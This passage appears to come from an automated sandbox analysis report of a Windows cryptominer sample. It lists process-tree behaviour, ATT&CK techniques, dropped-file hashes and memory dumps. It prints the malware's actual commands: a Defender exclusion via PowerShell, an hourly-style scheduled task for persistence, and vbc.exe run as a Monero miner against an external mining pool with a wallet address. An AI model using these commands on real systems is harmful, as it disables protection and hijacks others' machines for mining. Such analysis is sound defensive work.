  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
  2⤵
  PID:860
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
    3⤵
    - Creates scheduled task(s)
    PID:676
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:848

C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
  2⤵
  PID:1164
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
    3⤵
    - Creates scheduled task(s)
    PID:804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\edge\uninstall.dat

Filesize
5.1MB

MD5
a3d7148655137e92c28b33e48d088088

SHA1
bc98804abf481e58c925a0810c519c6c5f2d3ac0

SHA256
5b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f

SHA512
ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
60838ff2c4002703b09fe1b38de15996

SHA1
6d53e131c6470ae622f8eea471c9627a932f46d3

SHA256
06dbda2ec7c954579208597f88601287e34930bf7385463f7ca60e2868207312

SHA512
97347a0651573b709fc9d08577b578bf56d055033985a6cbc09b2a015912a27d9bf311352005f9cee7f668af3d895704e861ac0aba4a6b58893ada9bcc57b776

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
12ea9cdb6a3f477268a6aaff5bb71269

SHA1
e4c774b763d8ab5c36516b7a4fa2359e770dae03

SHA256
bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1

SHA512
1a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
12ea9cdb6a3f477268a6aaff5bb71269

SHA1
e4c774b763d8ab5c36516b7a4fa2359e770dae03

SHA256
bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1

SHA512
1a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
12ea9cdb6a3f477268a6aaff5bb71269

SHA1
e4c774b763d8ab5c36516b7a4fa2359e770dae03

SHA256
bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1

SHA512
1a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
12ea9cdb6a3f477268a6aaff5bb71269

SHA1
e4c774b763d8ab5c36516b7a4fa2359e770dae03

SHA256
bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1

SHA512
1a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
12ea9cdb6a3f477268a6aaff5bb71269

SHA1
e4c774b763d8ab5c36516b7a4fa2359e770dae03

SHA256
bde02458cc56f087e16137f2fe1d5ccf886fbe525d7a45423445de28b4af3ec1

SHA512
1a02151ba4c1bc71fefdc38776f749f73b84df299b6cc3adf7837f12a3ed10ba17004590ec20ae61769191ce4b2ba9dd24646b5e65b8250217ca2b2391e35434

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

Filesize
3.1MB

MD5
7737cc2f0bf1d0aebcaf14be3e1d83fe

SHA1
17784293db75fd968fadb557b95da28fcecc8189

SHA256
0eac2b0a121b287a323a3941dfcb2244c026656d29c20697abe90ead1d50dc9c

SHA512
f8a5346fcc5c295a3ccff948f2c8b7a6c0c21266b49fb79f195d47e24f8a86fc739b4569d83a53f5b9e237ca8a09d5ed931c5422e52e162945e6b1db939d995d

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe

Filesize
3.1MB

MD5
7737cc2f0bf1d0aebcaf14be3e1d83fe

SHA1
17784293db75fd968fadb557b95da28fcecc8189

SHA256
0eac2b0a121b287a323a3941dfcb2244c026656d29c20697abe90ead1d50dc9c

SHA512
f8a5346fcc5c295a3ccff948f2c8b7a6c0c21266b49fb79f195d47e24f8a86fc739b4569d83a53f5b9e237ca8a09d5ed931c5422e52e162945e6b1db939d995d

Download Submit
memory/188-210-0x00000000020FB000-0x000000000211A000-memory.dmp

Filesize
124KB

Download
memory/188-211-0x00000000020F4000-0x00000000020F7000-memory.dmp

Filesize
12KB

Download
memory/432-342-0x0000000002324000-0x0000000002327000-memory.dmp

Filesize
12KB

Download
memory/432-343-0x000000000232B000-0x000000000234A000-memory.dmp

Filesize
124KB

Download
memory/848-368-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/852-290-0x00000000013C0000-0x0000000001646000-memory.dmp

Filesize
2.5MB

Download
memory/852-296-0x00000000013C0000-0x0000000001646000-memory.dmp

Filesize
2.5MB

Download
memory/852-297-0x0000000000520000-0x0000000000561000-memory.dmp

Filesize
260KB

Download
memory/860-173-0x00000000025BB000-0x00000000025DA000-memory.dmp

Filesize
124KB

Download
memory/860-172-0x00000000025B4000-0x00000000025B7000-memory.dmp

Filesize
12KB

Download
memory/860-174-0x00000000025B4000-0x00000000025B7000-memory.dmp

Filesize
12KB

Download
memory/860-175-0x00000000025BB000-0x00000000025DA000-memory.dmp

Filesize
124KB

Download
memory/1104-80-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1104-93-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1104-94-0x0000000003270000-0x00000000034F6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-200-0x0000000003350000-0x00000000035D6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-92-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1104-180-0x0000000003350000-0x00000000035D6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-87-0x0000000001FE0000-0x0000000001FF0000-memory.dmp

Filesize
64KB

Download
memory/1104-212-0x0000000003350000-0x00000000035D6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-234-0x0000000003350000-0x00000000035D6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-81-0x0000000003270000-0x00000000034F6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-79-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/1104-169-0x0000000003350000-0x00000000035D6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-168-0x0000000003350000-0x00000000035D6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-300-0x0000000003350000-0x00000000035D6000-memory.dmp

Filesize
2.5MB

Download
memory/1104-339-0x00000000031E0000-0x0000000003466000-memory.dmp

Filesize
2.5MB

Download
memory/1104-341-0x00000000031E0000-0x0000000003466000-memory.dmp

Filesize
2.5MB

Download
memory/1104-369-0x00000000031E0000-0x0000000003466000-memory.dmp

Filesize
2.5MB

Download
memory/1164-141-0x000007FEFA850000-0x000007FEFA8BF000-memory.dmp

Filesize
444KB

Download
memory/1164-139-0x0000000001270000-0x00000000014F6000-memory.dmp

Filesize
2.5MB

Download
memory/1164-213-0x0000000001270000-0x00000000014F6000-memory.dmp

Filesize
2.5MB

Download
memory/1164-179-0x0000000000700000-0x0000000000741000-memory.dmp

Filesize
260KB

Download
memory/1164-178-0x0000000001270000-0x00000000014F6000-memory.dmp

Filesize
2.5MB

Download
memory/1164-155-0x0000000001270000-0x00000000014F6000-memory.dmp

Filesize
2.5MB

Download
memory/1164-145-0x000007FEFEFD0000-0x000007FEFF06F000-memory.dmp

Filesize
636KB

Download
memory/1164-146-0x0000000076EE0000-0x0000000076FFF000-memory.dmp

Filesize
1.1MB

Download
memory/1164-142-0x000007FEF66F0000-0x000007FEF678C000-memory.dmp

Filesize
624KB

Download
memory/1164-143-0x000007FEFE4B0000-0x000007FEFE517000-memory.dmp

Filesize
412KB

Download
memory/1164-144-0x0000000076DE0000-0x0000000076EDA000-memory.dmp

Filesize
1000KB

Download
memory/1164-140-0x0000000000700000-0x0000000000741000-memory.dmp

Filesize
260KB

Download
memory/1208-72-0x000007FEF6380000-0x000007FEF64AC000-memory.dmp

Filesize
1.2MB

Download
memory/1208-104-0x000007FEFD1A0000-0x000007FEFD1D6000-memory.dmp

Filesize
216KB

Download
memory/1208-56-0x000007FEFA820000-0x000007FEFA8BC000-memory.dmp

Filesize
624KB

Download
memory/1208-57-0x000007FEFE4B0000-0x000007FEFE517000-memory.dmp

Filesize
412KB

Download
memory/1208-58-0x0000000076DE0000-0x0000000076EDA000-memory.dmp

Filesize
1000KB

Download
memory/1208-135-0x0000000000F10000-0x0000000001196000-memory.dmp

Filesize
2.5MB

Download
memory/1208-59-0x000007FEFEFD0000-0x000007FEFF06F000-memory.dmp

Filesize
636KB

Download
memory/1208-60-0x0000000076EE0000-0x0000000076FFF000-memory.dmp

Filesize
1.1MB

Download
memory/1208-61-0x000007FEFD0C0000-0x000007FEFD12C000-memory.dmp

Filesize
432KB

Download
memory/1208-62-0x000007FEFE980000-0x000007FEFE9F1000-memory.dmp

Filesize
452KB

Download
memory/1208-55-0x000007FEFAAF0000-0x000007FEFAB5F000-memory.dmp

Filesize
444KB

Download
memory/1208-63-0x000007FEF6690000-0x000007FEF6787000-memory.dmp

Filesize
988KB

Download
memory/1208-64-0x000007FEFE6C0000-0x000007FEFE79B000-memory.dmp

Filesize
876KB

Download
memory/1208-65-0x000007FEF5780000-0x000007FEF616C000-memory.dmp

Filesize
9.9MB

Download
memory/1208-66-0x0000000000F10000-0x0000000001196000-memory.dmp

Filesize
2.5MB

Download
memory/1208-67-0x00000000004F0000-0x0000000000531000-memory.dmp

Filesize
260KB

Download
memory/1208-68-0x000007FEFD1E0000-0x000007FEFD30D000-memory.dmp

Filesize
1.2MB

Download
memory/1208-69-0x000007FEFEB10000-0x000007FEFED13000-memory.dmp

Filesize
2.0MB

Download
memory/1208-70-0x000007FEFB570000-0x000007FEFB5C6000-memory.dmp

Filesize
344KB

Download
memory/1208-76-0x000007FEFE3D0000-0x000007FEFE4A7000-memory.dmp

Filesize
860KB

Download
memory/1208-105-0x000007FEFC460000-0x000007FEFC4BB000-memory.dmp

Filesize
364KB

Download
memory/1208-86-0x00000000004F0000-0x0000000000531000-memory.dmp

Filesize
260KB

Download
memory/1208-103-0x000007FEFAA00000-0x000007FEFAA27000-memory.dmp

Filesize
156KB

Download
memory/1208-102-0x000007FEFCC10000-0x000007FEFCC35000-memory.dmp

Filesize
148KB

Download
memory/1208-101-0x000007FEF9BA0000-0x000007FEF9C11000-memory.dmp

Filesize
452KB

Download
memory/1208-100-0x000007FEF9950000-0x000007FEF99B4000-memory.dmp

Filesize
400KB

Download
memory/1208-99-0x000007FEFE5A0000-0x000007FEFE5ED000-memory.dmp

Filesize
308KB

Download
memory/1208-98-0x000007FEF0D50000-0x000007FEF0DB2000-memory.dmp

Filesize
392KB

Download
memory/1208-97-0x000007FEFA4A0000-0x000007FEFA4BC000-memory.dmp

Filesize
112KB

Download
memory/1208-71-0x0000000000F10000-0x0000000001196000-memory.dmp

Filesize
2.5MB

Download
memory/1208-73-0x000007FEFC790000-0x000007FEFC7B2000-memory.dmp

Filesize
136KB

Download
memory/1208-96-0x000007FEFC640000-0x000007FEFC657000-memory.dmp

Filesize
92KB

Download
memory/1208-90-0x000007FEFB310000-0x000007FEFB525000-memory.dmp

Filesize
2.1MB

Download
memory/1208-95-0x000007FEFE7D0000-0x000007FEFE7EF000-memory.dmp

Filesize
124KB

Download
memory/1216-274-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1216-273-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1216-305-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1220-248-0x00000000028CB000-0x00000000028EA000-memory.dmp

Filesize
124KB

Download
memory/1220-246-0x00000000028C4000-0x00000000028C7000-memory.dmp

Filesize
12KB

Download
memory/1324-233-0x0000000000500000-0x0000000000541000-memory.dmp

Filesize
260KB

Download
memory/1324-306-0x00000000013C0000-0x0000000001646000-memory.dmp

Filesize
2.5MB

Download
memory/1324-229-0x00000000013C0000-0x0000000001646000-memory.dmp

Filesize
2.5MB

Download
memory/1384-198-0x0000000000620000-0x0000000000661000-memory.dmp

Filesize
260KB

Download
memory/1384-208-0x0000000001270000-0x00000000014F6000-memory.dmp

Filesize
2.5MB

Download
memory/1384-196-0x0000000001270000-0x00000000014F6000-memory.dmp

Filesize
2.5MB

Download
memory/1424-77-0x000007FEED120000-0x000007FEEDB43000-memory.dmp

Filesize
10.1MB

Download
memory/1424-83-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/1424-84-0x0000000002504000-0x0000000002507000-memory.dmp

Filesize
12KB

Download
memory/1424-85-0x000000000250B000-0x000000000252A000-memory.dmp

Filesize
124KB

Download
memory/1424-82-0x000007FEEC5C0000-0x000007FEED11D000-memory.dmp

Filesize
11.4MB

Download
memory/1424-75-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

Filesize
8KB

Download
memory/1692-106-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-129-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1692-132-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1692-113-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-116-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-111-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-118-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-133-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-134-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1692-115-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-136-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-109-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-131-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/1692-107-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-120-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-121-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-130-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-123-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-125-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1692-128-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1732-304-0x000000000294B000-0x000000000296A000-memory.dmp

Filesize
124KB

Download
memory/1732-303-0x0000000002944000-0x0000000002947000-memory.dmp

Filesize
12KB

Download
memory/2012-337-0x00000000000F0000-0x0000000000131000-memory.dmp

Filesize
260KB

Download
memory/2012-336-0x00000000011F0000-0x0000000001476000-memory.dmp

Filesize
2.5MB

Download
memory/2012-322-0x00000000011F0000-0x0000000001476000-memory.dmp

Filesize
2.5MB

Download